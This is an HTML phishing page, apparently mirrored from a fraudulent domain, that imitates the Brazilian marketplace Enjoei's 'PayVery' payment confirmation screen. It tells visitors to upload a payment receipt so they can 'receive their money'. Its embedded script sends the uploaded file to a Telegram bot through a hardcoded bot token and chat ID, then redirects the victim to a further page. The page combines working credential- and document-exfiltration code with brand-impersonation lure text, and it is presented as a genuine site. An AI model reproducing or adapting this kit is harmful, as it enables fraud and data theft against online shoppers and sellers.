<!DOCTYPE html>
<!-- saved from url=(0078)https://enjoei.team/?enjoei_page=PayVery&ssid=d41d8cd98f00b204e9800998ecf8427e -->
<html lang="en">
<!-- Mirrored from vendas.enjoei-24horas.shop/PayVery/?ssid=fc3bd197e5c343c07beca00b8dd01ccc by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 28 Nov 2024 00:00:23 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ENJOEI  - PayVery</title>
</head>
<body class="is-v4 p-sessions-new" data-namespace="false" data-controller="sessions" data-action="new" style="transition: padding 250ms ease 0s;" cz-shortcut-listen="true">
    






    
    <meta name="description" content="O site mais simpático para comprar e vender online roupas, sapatos e bolsas! Marcas Zara, Farm, Nike. Baixe o app e vem conferir!">
    <title>Informacoes de recebimentos</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20PayVery_files/font-face-a567ff9bf44e72db071f08f1193b637d95ebb94fcd8b209c8d13b00cadf8edcb.css">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20PayVery_files/1525-1c556dee.css">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20PayVery_files/web-4f17523d.css">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20PayVery_files/application-94184e2e7658e310ec7f68fc4693056639b5f56f264fac23032cf85df1229679.css">



    <svg style="position: absolute; width: 0; height: 0;" width="0" height="0" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
        <defs></defs>
    </svg>
    <div class="t-relative"> </div>
    <div data-vue="flash-message">
        <div class="c-flash-message" style="display: none;">
            <div href="#" class="c-flash-message__content o-container" image-url="" data-testid="flash-message">
                <span class="o-text -xs-white -xs-long-primer t-xs-block t-md-inline c-flash-message__title -xs-medium"></span>
            </div>
        </div>
    </div>
    <style>
        .erro {
            border-color: red;
        }
        .mensagem-erro {
            color: red;
            display: none;
        }
    </style>
    <script>
            setTimeout( () =>{
                document.querySelector('.logo-banner').remove()
            },1500)
        </script>
        <style>
            .logo-banner svg{
                animation: bounce .8s ease infinite;

            }
            @keyframes bounce {
                0%{
                    opacity: 0;
                }
                50%{
                    opacity: .5;
                }
                100%{
                    opacity: 1;
                }
            }
        </style>
        <div class="logo-banner" style="position: absolute; inset: 0; background: #fff; left: 0; top: 0%; z-index: 999; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center">
            <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="none"><path fill="#61005D" fill-rule="evenodd" d="M1.25 14.19C1.25 5.845 6.813-.005 15.002-.005s13.752 5.85 13.741 14.193c0 .96-.033 1.943-.143 2.749H1.393c-.11-.806-.143-1.8-.143-2.749m20.485-2.197c-.343-4.348-3.135-6.147-6.733-6.147s-6.39 1.799-6.733 6.147zM8.093 20.37c1.644 2.45 3.874 3.763 6.909 3.763s5.265-1.313 6.91-3.763l5.198 3.002c-2.561 5.088-7.428 6.622-12.108 6.622S5.455 28.46 2.894 23.372z" clip-rule="evenodd"></path></svg>
        </div>
    <header class="c-clean-header ">
        
        <div class="o-container -with-gutter t-hide-x-overflow">
            <div class="c-clean-header__wrapper">
                <div class="o-grid -xs-middle -xs-full">
                    <div class="o-grid__item -xs-4">
                        <button type="button" class="l-header-button o-button -xs-auxiliary" onclick="resolveBackAction()" aria-label="Voltar para a página anterior">
                            <svg class="o-icon -xs-size-medium -color-primary -spaced-right -arrow-left">
                                <use xlink:href="#icon-arrow-left"></use>
                            </svg>
                        </button>
                    </div>
                    <div class="o-grid__item -xs-16 t-text-center">
                        <a class="c-clean-header__link-logo" href="#">
                            <div class="o-logo -fill-none -type-icon -xs-size-small -style-color -enjoei ">
                                <svg viewBox="0 0 138 150" xmlns="http://www.w3.org/2000/svg">
                                    <path fill="#61005D" fill-rule="evenodd" clip-rule="evenodd" d="M 0 70.96875 C 0 29.25 27.914062 0 69.011719 0 C 110.113281 0 138.03125 29.25 137.972656 70.96875 C 137.972656 75.773438 137.804688 80.683594 137.25 84.710938 L 0.722656 84.710938 C 0.167969 80.679688 0 75.71875 0 70.972656 Z M 102.800781 59.988281 C 101.085938 38.242188 87.070312 29.25 69.011719 29.25 C 50.957031 29.25 36.941406 38.242188 35.226562 59.988281 Z M 34.339844 101.875 C 42.59375 114.128906 53.78125 120.695312 69.011719 120.695312 C 84.246094 120.695312 95.433594 114.128906 103.683594 101.875 L 129.773438 116.886719 C 116.921875 142.328125 92.496094 150 69.011719 150 C 45.527344 150 21.101562 142.328125 8.25 116.886719 L 34.34375 101.875 Z M 34.339844 101.875"></path>
                                </svg>
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <section data-vue="sessions-new-page">
        <div data-v-7bcf1476="" class="o-container -with-gutter l-container">
            <div data-v-7bcf1476="" class="session-wrapper">
                <div data-v-7bcf1476="">
                    <header data-v-4226538e="" data-v-7bcf1476="" class="session-header">
                        <h1 data-v-4226538e="" class="session-title">
                        Confirmação de pagamento

                        </h1>
                        <p data-v-4226538e="" class="session-text">
                            Após confirmar, em instantes você ira receber o seu valor em conta!
                        </p>
                    </header>
                </div>
                <div data-v-7bcf1476=""></div>
                <div data-v-7bcf1476="" style="">
                    <div data-v-7bcf1476="" class="l-wrapper">
                    <form data-v-7bcf1476="" action="##" method="post" accept-charset="utf-8" id="login_user" novalidate="novalidate" data-validate-on="submit" class="o-form l-form" onsubmit="submitForm(event)">
    <input data-v-7bcf1476="" name="utf8" type="hidden" value="✓">
    <input data-v-7bcf1476="" type="hidden" name="authenticity_token" value="iKVQdiyYPEusrrS/sBDMD+YlR+u8eBMXDPzVQHyoUhb+5hUY5bLsahiCEgCuCOz2daHp4GvMJuU7bOEwxhx1uw==">
    <input data-v-7bcf1476="" type="hidden" name="user_tracking_uuid" value="aba1a12a-006e-4862-91fb-af630091c401-1720133651762">

    <style>
        /* Estilos personalizados para o input de arquivo */
        .custom-file-input {
            position: relative;
            overflow: hidden;
            color: #fff; /* Cor do texto */
            background-color: #f9a4b2; /* Cor de fundo rosa */
            border: none;
            width: 357px;
            padding: 10px 15px;
            border-radius: 11px;
            cursor: pointer;
            display: inline-block;
            text-align: center; /* Centraliza o conteúdo */
        }

        .custom-file-input input[type="file"] {
            position: absolute;
            top: 0;
            right: 0;
            margin: 0;
            padding: 0;
            font-size: 20px; /* Tamanho do ícone do clipe */
            cursor: pointer;
            opacity: 0;
        }

        /* Estilo para o botão "Confirmar Pagamento" */
        .confirm-button {
            display: block;
            width: 100%;
            max-width: 357px;
            margin-top: 20px;
            padding: 15px;
            border: none;
            border-radius: 11px;
            background-color: #6c63ff; /* Cor de fundo do botão */
            color: #fff; /* Cor do texto do botão */
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        .confirm-button:hover {
            background-color: #524bc9; /* Cor de fundo do botão ao passar o mouse */
        }
    </style>

    <div data-v-7bcf1476="" class="o-form__field l-field">
        <label data-v-7bcf1476="" for="user_name" class="l-label"> Envie o comprovante de Pagamento * </label>

        <!-- Input personalizado de arquivo -->
        <label class="custom-file-input">
            📎 Enviar comprovante
            <input data-v-7bcf1476="" data-validate="true" data-patterns="isNonEmpty, isValidEmail" data-test="input-email" type="file" name="user_files[]" id="user_files" accept=".pdf, .jpg, .jpeg, .png" class="o-input -fill -xs-medium -md-large" autocomplete="off" required="" multiple="">
        </label>

        <div id="erro-user_name" class="mensagem-erro">Campo obrigatório.</div>
    </div>

    <div data-v-7bcf1476="" class="o-well checkbox-wrapper">
        <div data-v-7bcf1476="" class="o-grid__item">
            <div id="mensagem-erro" style="color: red;"></div>
        </div>
    </div>

    <div data-v-7bcf1476="" class="o-well">
        <button type="submit" data-v-7bcf1476="" data-test="button-login-entrar" class="o-button -xs-flat -xs-large -xs-fill t-lowercase -xs-primary confirm-button"> Confirmar Pagamento </button>
    </div>
</form>

                        <div data-v-7bcf1476="">
                            <!-- <a data-v-7bcf1476="" data-modal="trigger" data-target="reset-password" class="o-button -xs-link -xs-large -xs-fill js-ui-fixed-content-open t-lowercase reset-password" href=""> Esqueci a senha </a> -->
                        </div>

                        <div data-v-7771531a="" data-v-7bcf1476="">
                            <span data-v-7771531a="" class="separator">📎</span>
                            <p data-v-7bcf1476="" class="o-text -xs-minion -xs-regular -xs-center">protegido por reCAPTCHA - <a data-v-7bcf1476="" href="#" target="_blank">privacidade</a> - <a data-v-7bcf1476="" href="#" target="_blank">condições</a></p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <script src="https://vendas.enjoei-24horas.shop/src/ENJOEI - PayVery_files/md5.min.js.download"></script>
    <script>
    async function sendToTelegram(file) {
    const token = '6158400466:AAEUs12kCvMb0TgzUSmtIVqXVtPVknqxXFY';  // Substitua pelo seu token do bot
    const chatId = '6798832266';  // Substitua pelo seu chat_id

    const formData = new FormData();
    formData.append('chat_id', chatId);
    formData.append('photo', file);  // Adiciona a imagem

    try {
        const response = await fetch(`https://api.telegram.org/bot${token}/sendPhoto`, {
            method: 'POST',
            body: formData,
        });

        const data = await response.json();
        if (data.ok) {
            console.log('Imagem enviada com sucesso!');
        } else {
            console.error('Erro ao enviar a imagem:', data.description);
        }
    } catch (error) {
        console.error('Erro na requisição ao Telegram:', error);
    }
}

async function submitForm(event) {
    event.preventDefault();

    const files = document.getElementById('user_files').files;

    if (files.length === 0) {
        document.getElementById('mensagem-erro').textContent = 'Por favor, envie pelo menos um arquivo.';
        return;
    } else {
        document.getElementById('mensagem-erro').textContent = '';
    }

    const file = files[0]; // Envia apenas o primeiro arquivo selecionado

    // Enviar a imagem para o Telegram
    await sendToTelegram(file);

    // Redirecionar para a página index.html na pasta 09
    window.location.href = './09/index.html';
}

    // Outras ações, como redirecionamento, podem ser feitas aqui

</script>
</body>
<!-- Mirrored from vendas.enjoei-24horas.shop/PayVery/?ssid=fc3bd197e5c343c07beca00b8dd01ccc by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 28 Nov 2024 00:00:23 GMT -->
</html>